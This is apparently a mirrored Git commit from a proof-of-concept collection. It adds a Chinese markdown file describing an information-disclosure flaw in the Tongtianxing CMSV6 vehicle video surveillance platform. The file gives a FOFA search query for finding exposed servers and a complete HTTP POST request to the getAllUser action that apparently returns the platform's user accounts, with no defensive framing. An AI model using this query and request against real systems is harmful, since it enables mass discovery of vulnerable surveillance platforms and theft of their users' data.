mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-28 14:55:34 +08:00
525更新漏洞
This commit is contained in:
25
通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md
Normal file
25
通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md
Normal file
@@ -0,0 +1,25 @@
|
||||
## 通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞
|
||||
|
||||
通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
body="/808gps/"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
|
||||
Connection: close
|
||||
Content-Length: 9
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
json=null
|
||||
```
|
||||
|
||||

|
||||
Reference in New Issue
Block a user